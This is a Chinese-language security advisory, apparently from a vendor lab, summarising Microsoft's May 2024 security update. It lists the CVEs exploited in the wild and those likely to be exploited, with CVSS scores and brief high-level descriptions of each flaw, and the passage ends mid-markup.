<p>2024年05月15日，天融信阿尔法实验室监测到微软官方发布了05月安全更新。此次更新共修复60个漏洞（不包含2个外部分配漏洞和本月早些时候发布的6个Edge漏洞），其中1个严重漏洞、57个重要漏洞、1个中危漏洞、1个低危漏洞。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b9f6448d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABcSkgTrIxBsgHiaHKWYIddeKgQ7v38EL68obnaSRJjpxDrSOAf34MkIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">2024年05月15日，天融信阿尔法实验室监测到微软官方发布了05月安全更新。此次更新共修复60个漏洞（不包含2个外部分配漏洞和本月早些时候发布的6个Edge漏洞），其中1个严重漏洞(Critical)、57个重要漏洞(Important)、1个中危漏洞(Moderate)、1个低危漏洞(Low)。其中权限提升漏洞17个、远程代码执行漏洞25个、信息泄露漏洞7个、拒绝服务漏洞3个、欺骗漏洞5个、安全功能绕过漏洞2个、篡改漏洞1个。</span><br/></p><p style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">本次微软安全更新涉及组件包括：Windows MSHTML Platform、Windows DWM Core Library、Windows Common Log File System Driver、Windows Cloud Files Mini Filter Driver、Windows Win32K、Microsoft Office SharePoint、Windows Mobile Broadband、Windows Routing and Remote Access Service (RRAS)、Windows Hyper-V等多个产品和组件。</span></p><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="color: black;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgb(0, 0, 0);">微软本次修复中，CVE-2024-30040、CVE-2024-30051已发现在野利用，CVE-2024-30046、CVE-2024-30051被公开披露。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">重点</span></strong><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);">本次微软更新中重点漏洞的信息如下所示。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;font-size: 16px;"><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 16px;"><strong>在野利用和公开披露漏洞</strong></span></p></li></ul><table align="center" data-sort="sortDisabled" width="578"><tbody><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVE</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">漏洞名称</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVSS3.1</span></td></tr><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-30040</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows MSHTML平台安全功能绕过漏洞</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">8.8/8.2</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-30051</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows DWM核心库本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">7.8/7.2</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 14px;">CVE-2024-30040：Windows MSHTML平台安全功能绕过漏洞</span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用。该漏洞是Windows MSHTML平台中的不正确的输入验证漏洞（CWE-20）。未经身份认证的远程攻击者通过说服用户打开恶意文档来获得代码执行权限，此时攻击者可以在用户的上下文中执行任意代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">成功利用此漏洞的攻击者，可以绕过Microsoft 365和Microsoft Office中的OLE缓解措施，这些缓解措施可保护用户免受易受攻击的COM/OLE控件的侵害。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30051：Windows DWM核心库本地权限提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用，且被公开披露。该漏洞是Windows DWM核心库中的堆溢出漏洞（CWE-122）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">漏洞利用可能性较大的漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="329" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="65" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-29996</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows通用日志文件系统驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30025</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows通用日志文件系统驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30037</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows通用日志文件系统驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.5/6.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30032</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows DWM核心库本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30035</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows DWM核心库本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30034</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Cloud Files微过滤器驱动信息泄露漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">5.5/4.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30038</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30049</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30044</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SharePoint Server远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30050</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows网络标记(MOTW)安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">5.4/5.0</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-29996、CVE-2024-30025、CVE-2024-30037：Windows通用日志文件系统驱动本地权限提升漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">这些漏洞都是Windows通用日志文件系统驱动中的越界读漏洞（CWE-125）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30032、CVE-2024-30035：Windows DWM核心库本地权限提升漏洞</span></span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">这些漏洞都是Windows DWM核心库中的释放后重用漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30034：Windows Cloud Files微过滤器驱动信息泄露漏洞</span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows Cloud Files微过滤器驱动中的类型混淆漏洞（CWE-843）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以泄露某些内核内存内容。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30038、CVE-2024-30049：Windows Win32k本地权限提升漏洞</span></span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30038是Windows Win32k中的堆溢出漏洞（CWE-122）。CVE-2024-30049是Windows Win32k中的释放后重用漏洞（CWE-416）。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30044：Microsoft SharePoint Server远程代码执行漏洞</span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Microsoft SharePoint Server中的不可信数据的反序列化漏洞（CWE-502）。具有站点所有者或更高权限的经过身份认证的远程攻击者可以将特制文件上传到目标SharePoint Server，并构造特殊的API请求以触发文件参数的反序列化。这将使攻击者能够在目标SharePoint Server的上下文中执行远程代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30050：Windows网络标记(MOTW)安全功能绕过漏洞</span></span><br/></span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">为了利用此漏洞，攻击者可以在攻击者控制的服务器上托管文件，然后诱使目标用户下载并打开该文件。这可能允许攻击者绕过网络标记（Mark of the Web，MOTW）安全功能。</span><span style="font-size: 14px;letter-spacing: 0.578px;text-align: justify;text-indent: 0em;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;white-space: normal;list-style-type: square;"><li style="font-weight: bold;"><section style="margin-bottom: 8px;line-height: 1.6em;text-align: left;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);font-size: 16px;">高评分漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="314" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="70" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30006</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SQL Server的WDAC OLE DB提供程序远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30007</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft Brokering文件系统本地权限提升漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30009</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows路由和远程访问服务(RRAS)远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30010</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Hyper-V远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30017</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Hyper-V远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30006：Microsoft SQL Server的WDAC OLE DB提供程序远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">该漏洞是Microsoft SQL Server的WDAC OLE DB提供程序中的释放后重用漏洞（CWE-416）。攻击者可以通过欺骗经过身份认证的用户尝试通过OLEDB连接到恶意SQL服务器来利用此漏洞，这可能会导致从服务器接收到恶意网络数据包，并允许攻击者在客户端上远程执行代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30007：Microsoft Brokering文件系统本地权限提升漏洞</span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Microsoft Brokering文件系统中的不正确权限管理漏洞（CWE-269）。攻击者可以通过利用驱动程序网络路径验证管理中的安全疏忽来利用此漏洞，这可能会绕过已建立的安全协议，该协议旨在在应用程序与远程主机交互期间保护用户凭据。这可能会授予攻击者对网络资源未经授权的访问，并有助于在合法用户的假定身份下执行未经授权的操作。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">成功利用此漏洞的攻击者可能能够使用当前用户的凭据对远程主机进行身份认证。</span></section><section style="line-height: 